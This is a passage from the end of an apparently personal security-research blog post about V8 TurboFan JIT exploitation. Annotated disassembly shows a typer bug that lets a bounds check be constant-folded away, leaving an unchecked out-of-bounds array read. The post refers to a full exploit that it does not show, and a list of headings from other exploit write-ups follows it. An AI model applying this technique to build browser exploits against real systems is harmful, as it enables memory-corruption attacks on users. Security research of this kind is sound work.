- In-place update of 200: NumberLessThan(199, 225) by reducer TypeNarrowingReducer
- Replacement of 200: NumberLessThan(199, 225) with 94: HeapConstant[0x2584e3440659 <true>] by reducer ConstantFoldingReducer

At this point, there isn't any proper bound check left.

Observing the generated assembly

Let's run again the previous poc. We'll disassemble the function twice.

The first optimized code we can observe contains code related to:

a CheckedBounds with a length of MaxValue,
a bound check with a NumberLessThan with the correct length.

                =====   FIRST DISASSEMBLY  ===== 

0x11afad03119   119  41c1f91e       sarl r9, 30              // badly_typed >> 30
0x11afad0311d   11d  478d0c89       leal r9,[r9+r9*4]        // badly_typed * OOB_OFFSET

0x11afad03239   239  4c894de0       REX.W movq [rbp-0x20],r9

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)
0x11afad0326f   26f  817de0ffffff7f cmpl [rbp-0x20],0x7fffffff
0x11afad03276   276  0f830c010000   jnc 0x11afad03388  <+0x388> // go to Unreachable

// NumberLessThan (badly_typed, LoadField(array.length) = 2)
0x11afad0327c   27c  837de002       cmpl [rbp-0x20],0x2
0x11afad03280   280  0f8308010000   jnc 0x11afad0338e  <+0x38e>

// LoadElement
0x11afad03286   286  4c8b45e8       REX.W movq r8,[rbp-0x18]  // FixedArray
0x11afad0328a   28a  4c8b4de0       REX.W movq r9,[rbp-0x20]  // badly_typed * OOB_OFFSET
0x11afad0328e   28e  c4817b1044c80f vmovsd xmm0,[r8+r9*8+0xf] // arr[bad]

// Unreachable
0x11afad03388   388  cc             int3l // Unreachable node

The second disassembly is much more interesting. Indeed, only the code corresponding to the CheckBounds remains. The actual bound check was removed!

                     =====  SECOND DISASSEMBLY  ===== 

335 0x2e987c30412f   10f  c1ff1e         sarl rdi, 30 // badly_typed >> 30
336 0x2e987c304132   112  4c8d4120       REX.W leaq r8,[rcx+0x20]
337 0x2e987c304136   116  8d3cbf         leal rdi,[rdi+rdi*4] // badly_typed * OOB_OFFSET

// CheckBounds (index = badly_typed, length = Smi::kMaxValue)
400 0x2e987c304270   250  81ffffffff7f   cmpl rdi,0x7fffffff
401 0x2e987c304276   256  0f83b9000000   jnc 0x2e987c304335  <+0x315>
402 0x2e987c30427c   25c  c5fb1044f90f   vmovsd xmm0,[rcx+rdi*8+0xf] // unchecked access!

441 0x2e987c304335   315  cc             int3l  // Unreachable node

You can confirm it works by launching the full exploit on a patched 7.5 d8 shell.

Conclusion

As discussed in this article, the introduction of aborting CheckBounds kind of kills the CheckBound elimination technique for typer bug exploitation. However, we demonstrated a case where TurboFan would defer the bound checking to a NumberLessThan node that would then be incorrectly constant folded because of a bad typing.

Thanks for reading this. Please feel free to shoot me any feedback via my twitter: @__x86.

Special thanks to my friends Axel Souchet, yrp604 and Georgi Geshev for their review.

Also, if you're interested in TurboFan, don't miss out my future typhooncon talk!

A bit before publishing this post, saelo released a new phrack article on jit exploitation as well as the slides of his 0x41con talk.

References

Samuel Groß's latest phrack on jit exploitation
Samuel Groß's talk at 0x41con: JIT Exploitation Tricks
My previous introduction to TurboFan
Stephen Röttger's zer0con talk: A guided tour through Chrome's javascript compiler
Issue 8806: Harden turbofan's bounds check against typer bugs

Normal view

Introduction

Architecture

Bochscpu 101

Building the basics

Harnessing IDA: walking barefoot into the desert

Inserting test case

The birth of hope

Need for speed: whv backend

2 fast 2 furious: KVM backend

Wrapping up

How does a TPM on my PC advance this agenda?

A common misunderstanding

Takeaway

What, Where, WTF?

The cause

Minimal Example

Fin

Job Object Basics

The Method

The implications

Conclusion

Bypassing process freeze

Example

Suspend me more

Example

Conclusion

Existing options

Performance

The implementation

The problem at hand

Implementation

What, Where, WTF?

The cause

Minimal Example

Conclusion

Community server list

Developing a CS:GO proxy

OOB access in CSVCMsg_SplitScreen

Uninitialized memory in HTTP downloads leads to information disclosure

Putting it all together: ConVars as a gadget

ROP chain to RCE

Conclusion

Time Table

Breaking ASLR

Introduction

Problems with SourceMod (since the last post)

Frida? On Windows?

Okay, enough about Frida. Talk about Source bugs!

What if my target doesn’t have xinput.dll to defeat ASLR?

Bug Hunting - Struggling is fun!

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

Leaking uninitialized stack memory using a tricky ZIP file bug

The Final Chain + RCE!

Disclosure Timeline

Supporting Files

Final thoughts

Introduction

The Source Engine

Timeline:

The Code:

Intro to Source Games:

The Bugs:

Hunting:

Next Time

Why game invites do more than you think they do

Using console commands to build up an RCON connection

Abusing the RCON connection

Integer underflow in FindZipItem leads to remote code execution

Advancing the RCE even more

Timeline and final words

A little bit of history

What is TCP/IP hijacking?

What is the impact of TCP/IP hijacking nowadays?

Where is the bug?

Details:

OK, but what it has to do with IP ID?

Discovering client’s port

Finding the server’s SND.NEXT

Finding the client’s SND.NEXT

OOB access in `CSVCMsg_SplitScreen`